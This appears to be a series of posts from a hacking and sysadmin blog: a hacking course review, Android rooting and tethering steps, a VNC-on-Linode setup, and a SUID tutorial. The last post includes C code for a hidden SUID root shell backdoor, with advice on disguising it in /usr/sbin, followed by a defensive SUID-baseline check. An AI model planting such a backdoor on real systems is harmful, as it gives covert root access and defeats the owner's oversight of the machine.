

Ninja Security “Samurai Skills” Course

January 3rd, 2012 • Howto, Information Security, Systems Administration

I recently had the honor to take the full Ninja Security Course for hacking. This was a huge effort on their part. The course is jam-packed with instructional videos and slides!

Samurai Skill’s from Anti-Trust on Vimeo.

I spend most of my hacking time behind the wheel of Aircrack-ng, so almost all of this material was completely new to me. I learned more from the videos than I could have from any book. My brain seems to function much better when I am seeing, hands-on, how things actually work, so this course was perfect for me.

The above is a screenshot of the course, used without permission. In this section I was taught how to evade an IPS while performing advanced SQL injection attacks. A lot of what I do at my job involves Coldfusion applications communicating with Oracle databases. I can tell you that any webapp or application programmer, specialist, or even security analyst can seriously benefit from this set of videos alone.

If you browse to the page that offers the course, http://ninja-sec.com/index.php/samurai-skills/, you will see that the price has changed since my last post about this course: it is now cheaper, at $750 USD. They have added all new videos and PDF files, AND you get a FREE subscription to hakin9 magazine, which isn’t cheap ($180 USD+) and is probably my personal favorite hacking magazine. They are also offering a full year’s worth of support and updates. This is a huge value. Updates mean updated tools, and we all know that tools in infosec are constantly changing.

Even if you are new to the subject, this course would be perfect. It offers much more than all of the others, and a complete, solid understanding of how real world penetration testing actually works. I am a huge fan of the Metasploit Project. The recent book published by David Kennedy on the subject was amazing, to say the least. For some reason, I simply couldn’t find the time to actually dive straight into the project and test it as much as I could have. This course from Ninja Security teaches you, hands-on and from scratch, how Metasploit is used at a professional level, and gave me the opportunity I had missed.

I highly recommend this course to anyone looking to learn IT Security or advance their skill to the Samurai Level.

~Douglas.

Rooting Samsung Galaxy SII EPIC 4G Touch After Android Update to 2.3.6

December 13th, 2011 • Uncategorized

After the update to 2.3.6 my phone was unrooted, as usual. This time I tried the one-click method of rooting it as described here: http://forum.xda-developers.com/showthread.php?t=1342728, and it was as easy as pie. Now I’m back to root, with the original stock ROM.

~Trevelyn

How I Made a 4G Hotspot from my Galaxy S2 EPIC Touch

November 15th, 2011 • Android, Howto, Information Security, Mobile Development, WiFi Hacking

Abstract

Samsung Galaxy S II Epic 4G (Touch) (US) <-- the phone with the longest name ever. It's a really nice phone, but it lacked a few good software features, one being the ability to create a mobile hotspot from the phone to share my 4G connection without paying an extra (big) monthly fee. So, I had to root the phone by changing its kernel to a rooted kernel. This voids my warranty and is easily detectable by any technician at Sprint if I were to take this phone in for a repair. So, after rooting the system, I simply returned it to the stock kernel. This keeps the phone rooted, but it leaves the “Superuser” application on the phone. The only way I know of to remove it is by using the ADB shell. Easy enough.

This by no means is a tutorial, WEAKNET LABS is not responsible for damage you may cause to your phone by following along with me.

I switched to Sprint recently and got this phone:

Root it

You need a new kernel to be root on your new machine. I got mine from “Zedomax.” It’s not great at all, in fact it’s poorly designed, but we only use it temporarily. You can download it from his website here. I grabbed the tarball labeled “SPH-D710_Zedomax_EpicTouchKernel-v3.tar” to use with ODIN.
Next, I downloaded ODIN and Samsung Kies. You will need the drivers for the phone for ODIN to recognize it properly. DO NOT rely on Windows to get the drivers for you. And seriously, don’t follow the weird http://epic4gtouchroot.com/ website, it’s convoluted, is missing information and is just wrong sometimes.

Once you have Kies, simply run the application with the phone plugged in and allow it to say it’s completed and the phone is recognized properly. It will look like iTunes, but for your phone. Heh. You can check the Device Manager to see if the device was recognized or not, but that’s kind of overkill. Simply run ODIN. ODIN will show the device with a yellow label under it like so:

Now, you’re ready to go. If not, try unplugging the device and plugging it back in with Kies open. Next, you NEED to exit Kies completely. Make sure the tray icon is gone, and that no running process of Kies exists. Kies will screw up the flashing process we do with ODIN and could mess up the firmware in the phone. So, once killed, slam the “PDA” button in ODIN and select the tarball of the new kernel. Here is the file list I am using right now:

The file called acs-eg30-stock-pulled.tar is the stock kernel that someone pulled from the phone before rooting it. We will use that afterwards. Now, hit the “Start” button in ODIN. You will see the progress bar turn green and start to fill up. Once done, the default setting of “auto reboot” should simply reboot your phone. At this point, I foo bared the shit out of my phone, over and over, trying to get it to work properly with ODIN. I tried making the zip files tarballs, I tried all kinds of weird shit, only to realize that Kies was killing my firmware flashes. :( MAKE SURE IT’S CLOSED!! Now, you should check the kernel under Settings->About Phone->Kernel. You should see something that says “zedomax.” Go into your app drawer and look for this icon:

If found, you’re good to go! Now, try an application, like “Better Terminal Emulator.” Here you can type su and should be prompted to allow the application to use Super User (or root) privileges. Click “remember these settings” and click “Okay.” Now each time you use the application, you can just type “su” and you will see something like so:

Put Stock Kernel Back on There!

As I said before, this kernel from zedomax just sucks. Radio problems seem to be the worst issue, though there is a quick fix for it that says to update the Master Subsidy Lock Code. This is used when programming the phone with CDMA. It’s not re-programmed or updated, and shouldn’t need to be, seeing how this is an intermittent issue. So, it still doesn’t properly resolve the issue. Just put the stock kernel back until someone compiles a better working version. Get the acs-eg30-stock-pulled.tar file from the XDA developers and go through the same process of flashing the phone using ODIN. Make sure that Kies is not open!

Now your About phone screen should show this:

And you should still have full root access.

Tethering 4G and creating a WiFi Hotspot (AP)

There are many hotspot applications that can be used with a rooted phone in the android market, but not all can be used with this phone. I used this one: 3.1-beta6 WiFi-Tether

Awesome app, doesn’t work at all with the finicky 3DS, as nothing seems to play right with that damned thing, but it works with XBOX 360, and my laptop just fine.

Remove the SuperUser Application

The only way I know of is to grab the ADB shell here and run it. This requires a bit of command line experience, but it’s simple.

Run the shell:

adb shell

Become root:

su

Mount using Yaffs:

mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system

Remove the files:

rm /system/xbin/su
rm /system/bin/su
rm /system/app/Superuser.apk

Reboot:

reboot

Conclusion

So this is how I rooted the phone and got the WiFi Tethering for free. Rooting the device is the easy part, getting other devices to play well with the software AP is the hard part :)

Debian Linode and VNC Sessions.

November 3rd, 2011 • Howto, Programming, Systems Administration

VNC (Virtual Network Computing) servers allow one to connect to a machine via the RFB (Remote Frame Buffer) protocol and access its desktop remotely as if sitting right in front of that machine. Keyboard, mouse and all. Linode VPS boxen, to my knowledge, have no GPUs installed whatsoever. So, obviously, there’s no display, or even a display port:


weaknetlabs:/appdev# lspci
pcilib: Cannot open /proc/bus/pci
lspci: Cannot find any working access method.
weaknetlabs:/appdev#

BUT, we can still run X11 and Gnome. We just have to connect to the session before starting the X server, or else it will fail with:

Could not get primary PCI info!

waiting for X server to begin accepting connections
giving up.
xinit: Connection reset by peer (errno 104): unable to connect to X server
xinit: No such process (errno 3): Server error.

So let’s connect to a Gnome session on the Linode already! Who cares if there is no display! :D First we need to install some things that may take a long time:


apt-get install xfonts-base gnome xserver-xorg-core vnc4server

Once done, edit the file ~/.vnc/xstartup as root and add the following lines:


#!/bin/sh

# Uncomment the following two lines for normal desktop:
# unset SESSION_MANAGER
# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
gdm
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
startx &

Start the VNC Server with:


vncserver :0

Now simply cat the file ~/.vnc/<localhostname>:1.log and make sure it’s running, either with nmap localhost, which should show ports 5900 and 6000 open, or with netstat -pan. Next, connect to it using a VNC Viewer client. Here is a link to a great one for Windows.

Once connected you should see this:

Now type gnome-session into the command prompt and you will have a full blown Gnome Desktop on your Linode server :)
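A way to act on the netstat check above, as an added example that is not from the original post: the function below reads netstat -pan output and flags any VNC (5900+N) or X11 (6000+N) listener bound to something other than loopback, since on a VPS those are reachable from the whole Internet unless Xvnc is started with its -localhost option and reached through an SSH tunnel. The sample netstat output and the function name are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): flag VNC/X11 listeners that are
# reachable from outside the box. Feed it the output of "netstat -pan" (or
# "netstat -tln"); it prints each offending LISTEN line and returns 1 if any.
exposed_vnc_listeners() {
    awk '$6 == "LISTEN" {
        n = split($4, a, ":")
        port = a[n] + 0
        host = substr($4, 1, length($4) - length(a[n]) - 1)
        # VNC displays live on 5900+N, the X server itself on 6000+N
        vnc = (port >= 5900 && port <= 5999)
        x11 = (port >= 6000 && port <= 6063)
        if ((vnc || x11) && host != "127.0.0.1" && host != "::1") {
            print
            found = 1
        }
    } END { exit (found ? 1 : 0) }'
}

# Constructed sample of what "netstat -pan" might show on a Linode running the
# setup above: display :0 bound to every interface, a second one on loopback.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      1234/Xvnc4
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1234/Xvnc4
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      1300/Xvnc4
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      800/sshd
tcp6       0      0 :::5902                 :::*                    LISTEN      1400/Xvnc4'

# Run the check on the sample; on a real host use:  netstat -pan | exposed_vnc_listeners
if printf '%s\n' "$SAMPLE_NETSTAT" | exposed_vnc_listeners; then
    echo "VNC/X11 only listening on loopback"
else
    echo "the listeners above are reachable from the network: start Xvnc with -localhost and tunnel over SSH"
fi
```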

~Douglas.

UNIX/GNU Linux SUID Quick Tutorial

October 27th, 2011 • Information Security, Programming, Systems Administration

Here I explain some system administration on UNIX’s Set User ID, or SUID with a short video tutorial after the break.

In UNIX, we can have files (binaries) that run as the owner of the file, no matter who executes them. This is called the SUID attribute. You can set a file to SUID with:

chmod +4XXX file.exe

I put the exe extension just to show that the file is a binary. If you chown (change ownership of) this file to root, it will run as UID (User ID) “0″, or user “root.” Here is what the file looks like after chmod-ing it to 4XXX (XXX being your normal rwxrwxrwx settings, exempli gratia 777, 755, etc.; in our case I used 4755):

-rwsr-xr-x 1 root root 0 2011-10-27 22:21 file.exe

Here is what this means: the “s” in the owner’s execute position means the file is “suid” or “set user id,” which means it will change to the owner’s UID (in our case “root,” UID “0″) before executing.
The “r” is “read,” “w” is “write,” and “x” is “executable,” in sets of three for Owner, Group, and Other respectively.

How does it know the UID of the owner root, you say? It most likely looks at the lines in /etc/passwd:

root:x:0:0:root:/root:/bin/bash

The first zero is the UID, the second is the GUID, or Group User ID. The “x” means that the password hash and salt are stored in the /etc/shadow file instead.

Now, this does not work with shell scripts for more than just security purposes. If you’d like to do something like that, you would need to play with sudo and the sudoers file, but not all UNIX systems come with sudo.

So how do we work around that? By compiling an easy C program that runs it via a system() call!

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    /* Only shell out when the first argument is present and is exactly 1337 */
    if (argc > 1 && atoi(argv[1]) == 1337) {
        printf("shelling out.\n");
        system("sh");   /* the spawned shell inherits the effective UID set by the SUID bit */
    }
    return 0;
}

All this simple application does is run “sh”, i.e. spawn a new shell, as root IFF the number “1337″ is passed to it. Why did I include the number part? Well, to backdoor a system it’s incredibly easy to hide this small application, and since it is compiled, if found, the owner of the machine won’t know what it is. I usually call this something like “initsh” and put it in /usr/sbin so it looks very unsuspicious to the novice system administrator. My secret is out!!

echo $PATH | sed 's/:/\n/g' | xargs ls | grep initsh
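Taking the PATH search above a step further, here is an added example that is not from the original post (the function names are mine): it lists every set-user-ID file under a directory tree and diffs that list against a saved baseline, which is how an administrator would notice a binary like the one above appearing after the baseline was taken. The demo runs on a constructed directory tree, so it needs no root.

```shell
#!/bin/sh
# Added example (not from the original post): list set-user-ID files under a
# tree and diff them against a saved baseline, so a binary like "initsh" that
# appears after the baseline was taken stands out. Function names are mine.

# list_suid ROOT: every regular file under ROOT with the set-user-ID bit, sorted
# (sorted output is what comm needs below).
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# save_suid_baseline ROOT FILE: record the current SUID set, one path per line.
save_suid_baseline() {
    list_suid "$1" > "$2"
}

# check_suid_baseline FILE ROOT: print SUID files that are not in the baseline
# and return 1 if there are any, 0 when the set still matches.
check_suid_baseline() {
    extra=$(list_suid "$2" | comm -13 "$1" -)
    [ -z "$extra" ] && return 0
    printf '%s\n' "$extra" | sed 's/^/unexpected SUID file: /'
    return 1
}

# Demo on a constructed tree (no root needed: you can set the SUID bit on a
# file you own). On a real box ROOT would be / and the baseline would be
# taken right after installation, before anyone else had access.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/usr/sbin"
    : > "$root/usr/bin/passwd";  chmod 4755 "$root/usr/bin/passwd"   # legitimate SUID binary
    save_suid_baseline "$root" "$root/baseline.txt"
    : > "$root/usr/sbin/initsh"; chmod 4755 "$root/usr/sbin/initsh"  # the post's hidden binary
    if check_suid_baseline "$root/baseline.txt" "$root"; then
        echo "SUID set unchanged"
    else
        echo "SUID set changed, review the files listed above"
    fi
    rm -rf "$root"
}
demo
```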

Check out the video below:

~Douglas.